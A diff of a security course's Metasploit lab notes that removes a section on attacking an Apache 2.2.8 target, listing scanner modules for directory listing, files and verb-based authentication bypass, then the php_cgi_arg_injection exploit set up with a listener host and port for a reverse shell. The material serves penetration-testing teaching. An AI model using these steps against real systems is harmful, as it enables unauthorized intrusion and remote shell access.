tekperfect/devops-docs/docs/courses/08-Security/lessons/metasploit-labs.md

 4. Finally to run the exploit you can use the `run` or `exploit` command to execute it.

-## Apache 2.2.8

-1. Start by searching for exploit based on port number and NMAP scan results of the NMAP -sV -O scan of your taget with the greatest number of open ports.

-Example: `grep exploit search apache`

-2. Since we have so many Apache exploits lets use an Auxlilary scanner to search for any potential exploits we can use.

-`use auxiliary/scanner/http/dir_listing`

-`set rhosts xxx.xxx.xxx.xxx`

-`show options`

-`run`

-3. Since that was successful lets use an Auxlilary directory scanner to search for any potential exploits we can use.

-`use auxiliary/scanner/http/dir_scanner`

-`show options`

-`run`

-`set rhosts xxx.xxx.xxx.xxx`

-`run`

-4. Since that was successful lets use an Auxlilary file scanner to search for any potential exploits we can use.

-`use auxiliary/scanner/http/files_dir`

-`show options`

-`run`

-`set rhosts xxx.xxx.xxx.xxx`

-`run`

-5. Since that was successful lets use the verbose authorization bypass to search for any potential exploits we can use.

-`use auxiliary/scanner/http/verb_auth_bypass`

-`show options`

-`set rhosts xxx.xxx.xxx.xxx`

-`run`

-6. Since that was unsuccessful lets use the php_cgi injection exploit to search for any potential exploits we can use.

-`use exploit/multi/http/php_cgi_arg_injection`

-`set rhosts xxx.xxx.xxx.xxx`

-`show options`

-`set lhost xxx.xxx.xxx.xxx`

-`set lport 4444`

-`run` or `exploit`

 ## Postgres

 1. Start by searching for exploit based on port number and NMAP scan results of the NMAP -sV -O scan of your taget with the greatest number of open ports.